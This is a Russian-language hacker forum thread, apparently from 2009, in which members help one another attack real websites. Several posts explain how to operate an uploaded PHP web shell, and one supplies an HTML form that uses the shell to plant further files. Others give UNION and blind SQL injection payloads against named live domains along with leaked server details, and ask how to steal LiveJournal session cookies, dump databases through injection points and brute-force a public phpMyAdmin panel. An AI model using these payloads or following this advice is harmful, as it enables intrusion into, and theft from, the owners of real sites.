Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    Залили шелл c eval($_GET['b']); Что дальше ?:(
     
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    видно из веба? залил в файл с каким расширением? добавил "<?php ?>" к коду?
     
  3. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    из веба видно
    .php
    добавил. не знаю как залить полноценный шелл
     
  4. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    теперь обратись к скрипту site/file.php?b=ls
    если выведет список директорий. то воспользуйся одним из следующих способов скачивания файла с помощью командной строки.

     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    AFoST не торопись :)
    DeluxeS почитай что-нибудь, зачем тебе шелл. если ты не знаешь что делать?
     
    2 people like this.
  6. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    Заменил eval на system, всё ок
     
  7. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    как обычно, суета =\
    ты прав, поправляюсь)
    site/file.php?b=phpinfo();
    должно вылезти сопсно оно)
    а залить так
    создаешь форму
    <form action="site/file.php?b=copy($_FILES[file][tmp_name], $_GET[aa]);&aa=/path/file.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file"><br>
    <input type="submit" value="Загрузить"><br>
    </form>
    открываешь выбираешь файл и жмёшь отправить
     
    #10727 AFoST, 20 Dec 2009
    Last edited: 20 Dec 2009
  8. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    если на запрос .php?pageNum_Year=-2007/**/union/**/select/**/version(),2/*
    КАК правильно составит запрос
     
  9. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Последнее время это самый популярный вопрос в теме))
    unhex(hex(version()))
     
  10. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс за ответ решил с помошью CONVERT(user() USING latin1)
    блин дурак сам не догодался
     
  11. Oza

    Oza Banned

    Joined:
    19 Jan 2009
    Messages:
    0
    Likes Received:
    13
    Reputations:
    -1
    Не выходит заюзать sipt4 для слепой скули.
    Загружаю таблицы,перехожу на вкладку брутфорс.Туды фигачу:
    SELECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+{N1-100},1
    url http://betonex.com.ua/?l=1

    после прохода по Auto Determine пишет:
    Autodetermine failed

    http://betonex.com.ua/?l=2%20and%20substring(@@version,1,1)=4

    Прошу помочь :confused:
     
    #10731 Oza, 21 Dec 2009
    Last edited: 21 Dec 2009
  12. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Помочь-то с чем? С сиптом? Со скулей?
    Code:
    @@tmpdir: /tmp
    @@basedir: /usr/
    version(): 5.1.36
    database(): betonex_com_ua
    @@datadir: /var/lib/mysql/
    @@version_compile_os: redhat-linux-gnu
    
     
  13. Oza

    Oza Banned

    Joined:
    19 Jan 2009
    Messages:
    0
    Likes Received:
    13
    Reputations:
    -1
    Спасибо.
    Мне бы ещё с сиптом помогли.
    Не могу понять как правильно указывать параметры в BruteForce Attacking
    Нужно получить таблицы,в ручную долговато будет :(
     
  14. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    Как получить переменную сессии в livejournal.com? через document.cookie не выходит
     
  15. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    проблема с софтом для дампа бд. Раньше юзал simple SQLi Dumper и SQL helper, но в последнее время софтины начали работать очень не стабильно, к тому же пропускают некоторые записи в базах.

    Подскажите альтернативы.
     
  16. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    2 jecka3000
    sypex,mysqladmin.
     
  17. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    Работал с Mysql Front нормальная прога работает стабильно
    Посмотри ТУТ
     
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    $n@ke,Bramin спасибо,но это официальные проги. Для них нужно имя БД и пароль, а в моем случае, у меня есть только уязвимый линк и раскрученная скуль инъекция, именно поэтому я прибегл к помощи таких программ как SQL Helper & SSiD, если есть их аналоги в работет через уязвимый параметр, то именно они мне и подходят!
     
  19. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    jecka3000, тогда попробуйте эти
    https://forum.antichat.ru/showpost.php?p=236188&postcount=3
    https://forum.antichat.ru/thread158100-toolza.html
     
  20. Radiator

    Radiator Active Member

    Joined:
    17 Mar 2009
    Messages:
    394
    Likes Received:
    143
    Reputations:
    24
    вопрос есть сайт http://forapro.ru/myadmin/

    чем брутить?
     
Thread Status:
Not open for further replies.